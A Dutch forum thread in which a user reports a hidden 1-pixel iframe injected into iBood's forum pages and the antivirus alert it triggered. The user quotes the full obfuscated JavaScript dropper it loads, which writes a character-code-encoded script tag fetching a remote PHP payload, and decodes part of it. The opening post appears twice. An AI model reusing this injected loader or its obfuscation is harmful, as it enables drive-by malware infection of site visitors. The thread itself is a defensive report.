/u/57359/crop6025758336ecb_cropped.png?f=community)
Deze site wordt via een iframe geladen op de paginas van het ibood forum. Vanaf 19-9 staat er ineens deze code in de denk ik template die ibood gebruikt voor hun openingsposts.
<iframe style="width:1px;height: 1px" src="http://nl.effes.net/uh09325.htm"></iframe>
Ik weet niet of het opzet van ibood is maar het ziet er verdacht uit... Ook omdat er een aantal meldingen gedaan werden van een melding van het antivirus programma waneer mensen op het ibood forum browsen.
Ik heb zelf ook eenmalig een melding ontvangen:
24-9-2012 15:03:02 Web Attack: Malicious JAR File Download kj297c279fwq.getmyip.com:1342/images/1/668db76b2e66a75f99fdb9b583d5d526/674263890/439bb521f5b75d98f70f1791937cd46a.jar1 Web Attack: Malicious JAR File Download 6 attack blocked. Traffic has been blocked for this application: \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\JAVA\JRE7\BIN\JAVA.EXE
Daarna niet meer het lijkt random te gaan
Die htm file
Een gedeelde kan ik omzetten naar een pagina die hij wil openen:
Het bovenstaande is gelijk aan: <script src='http://nl.effes.net/i.php'></script>
Deze php file bevat volgens mij verder niets..
Waar ik benieuwd naar ben in wat de rest betekend. Heb verder totaal geen JS ervaring. Mischien is het wel niets maar ik vond het wel interessant..
if(t[16][t[15]]){l_s(t[15],t[16],t[17],t[18],t[19],t[20],t[21],t[22],t[5],t[4],t[1],t[12],s);}else if(!g_d(t[6],t[5],t[2],t[7],t[13])){s_p(t[6],t[5],t[2],t[2],t[14],t[19],t[23],t[24]);i_a(t[5],t[4],t[1],t[12],s);}}
<iframe style="width:1px;height: 1px" src="http://nl.effes.net/uh09325.htm"></iframe>
Ik weet niet of het opzet van ibood is maar het ziet er verdacht uit... Ook omdat er een aantal meldingen gedaan werden van een melding van het antivirus programma waneer mensen op het ibood forum browsen.
Ik heb zelf ook eenmalig een melding ontvangen:
24-9-2012 15:03:02 Web Attack: Malicious JAR File Download kj297c279fwq.getmyip.com:1342/images/1/668db76b2e66a75f99fdb9b583d5d526/674263890/439bb521f5b75d98f70f1791937cd46a.jar1 Web Attack: Malicious JAR File Download 6 attack blocked. Traffic has been blocked for this application: \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\JAVA\JRE7\BIN\JAVA.EXE
Daarna niet meer het lijkt random te gaan
Die htm file
code:
bevat onderstaand js script1
| http://nl.effes.net/uh09325.htm |
code:
1
2
3
4
5
6
7
8
9
| <script>
function g_d(c,d,n,s,u){var a=d[c][s](n+"=");if(a[1]){return u(a[1][s](';')[0]);}return null;}
function s_p(c,d,n,v,e,s,o,u){var t;t=new Date();t[o](t[u]()+7);d[c]=n+"="+e(v)+';expires='+t[s]()+';path=/';}
function i_a(d,w,f,s,l){for(i=0;i<l.length;i++){d[w](s[f](l[i]));}}
function s_d(u,v,w,x,y,z,a,b,c,d,e){var nD=new Date();nD[x](nD[z]()+7);nD[y]();v[u][w]('nD', nD);i_a(a,b,c,d,e);}
function l_s(a,b,c,d,e,f,g,h,i,j,k,l,m){if(b[a][g]('nD')){sD=b[a][g]('nD');var s=Date[f](sD);var cD=new Date();cD[e]();var c=Date[f](cD);m=24*60*60*1000;r=(s-c)/m;r=Math.round(r);if (r<0){s_d(a,b,c,d,e,h,i,j,k,l,m);}}else {s_d(a,b,c,d,e,h,i,j,k,l,m);}}
function i_s(){var t=new Array('getElementById','fromCharCode','body','removeChild','write',document,'cookie','split','createElement','join','getElementsByName','getElementsByTagName',String,unescape,escape,'localStorage',window,'setItem','setDate','toGMTString','parse','getItem','getDate','setUTCDate','getUTCDate');var s=new Array(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,110,108,46,101,102,102,101,115,46,110,101,116,47,105,46,112,104,112,39,62,60,47,115,99,114,105,112,116,62);if(t[16][t[15]]){l_s(t[15],t[16],t[17],t[18],t[19],t[20],t[21],t[22],t[5],t[4],t[1],t[12],s);}else if(!g_d(t[6],t[5],t[2],t[7],t[13])){s_p(t[6],t[5],t[2],t[2],t[14],t[19],t[23],t[24]);i_a(t[5],t[4],t[1],t[12],s);}}
i_s();
</script> |
Een gedeelde kan ik omzetten naar een pagina die hij wil openen:
code:
1
| (String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,110,108,46,101,102,102,101,115,46,110,101,116,47,105,46,112,104,112,39,62,60,47,115,99,114,105,112,116,62) |
Het bovenstaande is gelijk aan: <script src='http://nl.effes.net/i.php'></script>
Deze php file bevat volgens mij verder niets..
Waar ik benieuwd naar ben in wat de rest betekend. Heb verder totaal geen JS ervaring. Mischien is het wel niets maar ik vond het wel interessant..
if(t[16][t[15]]){l_s(t[15],t[16],t[17],t[18],t[19],t[20],t[21],t[22],t[5],t[4],t[1],t[12],s);}else if(!g_d(t[6],t[5],t[2],t[7],t[13])){s_p(t[6],t[5],t[2],t[2],t[14],t[19],t[23],t[24]);i_a(t[5],t[4],t[1],t[12],s);}}
/u/34186/crop62e07d174532d_cropped.png?f=community)
:strip_icc():strip_exif()/u/132250/d1ca484677dbb1382705e67689809639.jpeg?f=community)
Nog niet uit de oudere posts.
Het is lastig voor de bezoekers dat iBood geen informatie/blog/nieuws pagina heeft. Maar op iBood kom ik niet meer met mijn privé computer.. dit hebben ze nu mooi verprutst
/u/270752/bunny_avatar60.png?f=community){kind=avatar}
/u/207598/radioheadbear.png?f=community)
/u/353494/ProfielLogo.png?f=community)
/u/142011/crop65b383c6c6c2f_cropped.png?f=community)
/u/107051/jeroenmadtrix60.png?f=community)
